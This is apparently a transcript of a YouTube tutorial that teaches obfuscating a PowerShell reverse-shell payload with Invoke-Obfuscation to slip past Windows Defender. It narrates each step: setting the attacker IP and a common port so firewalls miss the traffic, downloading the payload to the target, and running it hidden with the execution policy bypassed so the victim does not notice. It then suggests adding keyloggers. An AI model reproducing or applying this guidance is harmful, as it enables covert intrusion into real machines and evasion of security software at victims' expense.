Windows Defender Bypass with Powershell & Invoke-Obfuscation

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

[Music] thank you all right guys so to go ahead and get started we're going to open up our Firefox and we're going to look for the invoke obfuscation repository by Daniel Bohannon and GitHub so you can Google that and once you're on here you're going to want to go ahead and copy the address the link for the repository over here in the code part and we're going to open up a terminal or a root terminal so we run everything at Sue and you're gonna find a directory that you want to clone it into I'm just going to put it in the opt directory because it's the optional directory that's what opt stands for so once you've chosen the directory you want to get going into we're just going to go ahead and get clone and we're going to paste the link for the GitHub uh repository for invoke authentication so give it a few seconds and it's cloned as you can see we have it right here and so now we're good to go so invoke obfuscation is a power cell tool itself guys to it to obtusecate uh Power sub payloads right so we're going to need to use Powershell to use this tool luckily for us Kylie Linux can use power saw so we're going to open that up all right once you've got Powershell opened up you're going to go to the directory you've cloned the invoke application tool so for me that is the opt and as you can see it's right here invoke application so we're going to go ahead and head inside of that directory and once we're inside that directory we can go ahead and start with the installation and you know starting the program so it's very simple go to the GitHub to the installation part and it's going to tell you what you need to do there's only two things you need to do so it's very simple as you can see we're going to import this module right here and then we're just going to start the program using the invoke obfuscation command so let's go ahead and copy that first one and paste it inside of the repository and you see we're inside the invoke confiscation so it's very important you got to be inside the directory right so we've got no errors so we should be good to go and once you've imported the module all you got to do is type in invoke obfuscation and that's going to go ahead and start up the program so now we can actually start obfuscating our Powershell payloads right so before we obvious get anything we obviously need a power cell payload to obviously so to look for one I like to use payloads other things from swisskey repo and uh once you're on this uh GitHub just going to want to go to the Powershell part click on Powershell and I like to use this one right here the second one now we're not going to copy this part right here before the quotation marks because you know we don't need that we're just going to get the straight raw payload so we're going to copy past this double quote Mark right now we're going to skip the last quote double quote as well so just copy everything in between the double quotes and don't copy that last double quote I'm going to copy that and that's the actual raw Powershell payload right so let's open up a terminal so that we can actually create this file in our Kali machine and then we can set the uh the path to the file so that we get obfuscated so we're just going to go ahead and go to our Kali directory and just put the file there and let's see if we've got the fire okay so let's create a file called ninja dot PS1 uh we're just going to go ahead and paste in the payload that we got from payloads other things and we're gonna change two things the IP address and the port so let's find out what our IP address is let's go ifconfig and our IP address is 10099 right so let's go ahead and change that one to 99 and the port that we're going to use is Port 80 because that's a commonly used Port so it shouldn't give us any issues uh when you know facing a firewall or any of that kind of stuff right so just a tip you may want to use commonly used ports for reverse shelves so that the traffic doesn't get flagged by a firewall Etc right so it's common practice uh we're gonna go ahead and save that and that's going to be our payload that we're gonna obfuscate so it's in the it's in the home slash Cali directory so wherever you put your payload keep that in mind because you're gonna need to set the full path for when you're obfuscating it using in-book obfuscation right so let's go back to our Powershell and now we're gonna set the path to the script that we just created which is the Powershell payload right so we're going to say set script path I'm going to put the path so home Kali ninja dot PS1 and it says successfully set the script path so we're good to go and now all we've got to do is choose our options for how we're going to obfuscate this thing so I use AST for obfuscating my payload because it just works the best uh you can you know you can read in the GitHub and see how this works but I'm not going to be going into that too in depth today I'm just going to show you that you can do this and it does work so we're going to use AST which I found to be the best one so far and we're going to say all and we're going to type in one and that is going to give us our obfuscating payload so this is our actually obfuscated payload that we're gonna use um to actually execute on the Target right so let's go ahead and create a new file with this as the payload so go back to our root uh terminal and let's create a file called Ninja 2 dot PS1 right and this is going to be our obfuscated payload that we just created so we're gonna go ahead and save that and let's just cut it to see that it is in fact our our obfuscated payload so it's a variable variata as you can see that is the payload we got here so we're good to go guys all that's left to do now is get the file onto the target system and execute it and I'm also going to be showing you how to execute it as a background process so that it doesn't show on the screen because if you just execute this program without doing any modifications to so that you can make it in the background or make it a process or make it a scheduled task it's just going to show a window uh a blank Powershell window right so that's very sus uh anybody can tell that's probably not supposed to happen and they probably exit it and your connection will be lost so I'm going to be showing you how to make this run in the background and you know the user won't be aware so let's go ahead and do that so let's go ahead and host our python web server on port 8080 you're going to host the web server and the directory that you got your payload in so in my case it's in the home Kali directory and you're gonna hit enter and host that web server with the file in it and then we're going to go to our Windows Target PC in my case it's just going to be my computer and before we transfer the file let me show you that Windows Defender is currently on so as you can see here it's all on and this will be bypassing one of the Defenders that's the purpose of this video so we're gonna go ahead and open up CMD and we're going to go to our desktop directory you can go to whichever directory you want to uh normally if you were doing this in a real engagement you probably want to go to a directory that's always writable by any user but for this example we're just going to be using desktop for simplicity's sake right so unless you go ahead and use Powershell to transfer the file over right so let's type in power cell Taxi invoke web Quest I'm going to put in the IP address of the web server that's hosting our payload the port and the file name of the payload so I'm going to say ninja 2.ps1 out file and this is the output file the name of the file that you want to Output in the in the Windows computer so we're just going to name it Ninja dot PS1 and that's going to put that in the current directory that we're in right so if you wanted to put in a different directory you have to specify the drive and the full path okay so but for this example we're just going to put it in the current directory so we're going to hit enter and that's going to go ahead and download the file and as you can see here we've got it right here ninja.ps1 as you can see on our desktop ninja.ps one right okay so now what we want to do is we want to execute this payload and catch a reverse Power Cell on netcat right so before we do anything let's go ahead and open up a netcat listener on our Kali machine so we're going to say netcat lvmp Port 80 because that's the port we have in our payload and now we're ready to catch a reverse cell from our uh victims computer right so let's go ahead and go back to CMD and now all we got to do is type in Powershell .exe execution policy bypass window Style hidden and we're going to put file and it's going to be the file we're going to put double quotes C drive or whatever Drive you're on and we're in the users mj53g desktop directory and we're going to specify the file that we want to execute that's ninja.ps1 and we're going to end it with a double quote and all you got to do now is hit enter and that's going to go ahead and give us a reverse so as you can see we've got a connection immediately and there's no window nothing going on so nobody's any wiser of it and let me just show you guys here in the task manager what that looks like so if you ever see uh these two things running you may want to kill them it's uh you see right here Windows Powershell so you know you've got to win those Powershell uh running in the background and a Windows command processor so that's the background uh hidden window style that we specified right so if we go ahead and cancel these two things it will go ahead and cancel our connection but we're not going to do that let's just go ahead and hit enter and as you can see guys we have a connection on Powershell let's type in who am I to see Who We Are who am I approved to see the Privileges okay and we can do something like system info and basically the sky's the limit now you have access to the Target uh very important the the important part of this video is that we didn't even trigger Windows Defender so Windows Defender is just chilling it's just keep going on didn't detect anything so we're good to go and yeah guys that's basically how you can use invoke obfuscation Powershell to get a reverse cell and bypass Windows Defender and you could use this in conjunction with other you know attacks you can You Know download other payloads put key loggers Etc so very useful I hope you guys learned something without further Ado let's get up out of here [Music]

Info

Channel: CybertroniX103

Views: 4,459

Rating: undefined out of 5

Keywords: #how, #howto, #bypass, #windows, #defender, #windowsdefender, #windows10, #using, #powershell, #invoke, #obfuscation, #github, #2023, #working, #cybersecurity, #hacking, #hacker, #hack, #ethicalhacking, #information, #info, #infosec, #kali, #linux, #kalilinux, #pentesting

Id: NdyThrkNUwE

Channel Id: undefined

Length: 11min 9sec (669 seconds)

Published: Wed Aug 09 2023